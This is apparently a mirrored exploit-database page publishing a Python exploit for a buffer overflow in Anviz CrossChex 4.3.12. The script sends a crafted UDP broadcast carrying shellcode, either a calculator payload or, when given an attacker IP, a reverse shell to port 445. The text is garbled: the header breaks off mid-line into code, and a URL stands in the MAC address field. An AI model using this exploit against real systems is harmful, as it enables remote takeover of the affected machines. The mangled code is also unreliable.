Exploit/Advisories
Published on December 2nd, 2019 📆 | 5844 Views ⚑
0Anviz CrossChex 4.3.12 – Local Buffer Overflow
# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 2:
request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
else:
request = request + calculator_payload
scapy.all.sendp( Ether(src="http://www.exploit-db.com/00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
def setFuzzUDPServer(ip='', port=5050, timeout=150):
try :
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print('[!] Failed to create server socket')
try:
s.bind(('', port))
except:
print('[*] Server socket bind failed')
sys.exit()
print('[*] Waiting for crosschex')
s.settimeout(timeout)
timeout = time.time() + timeout
responses = []
while True:
if time.time() > timeout:
break
try:
response = s.recvfrom(1024)
print(response)
responses.append(response)
sendFuzzingUDPBroadcast(ip=ip)
response = s.recvfrom(1024)
except socket.timeout:
print("[!] Error with UDP server")
s.close()
return responses
nargs = len(sys.argv)
if nargs < 2:
print("[*] Usage: python3 %s []ntif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
sys.exit(0)
setFuzzUDPServer()
https://www.exploit-db.com/exploits/47734
Gloss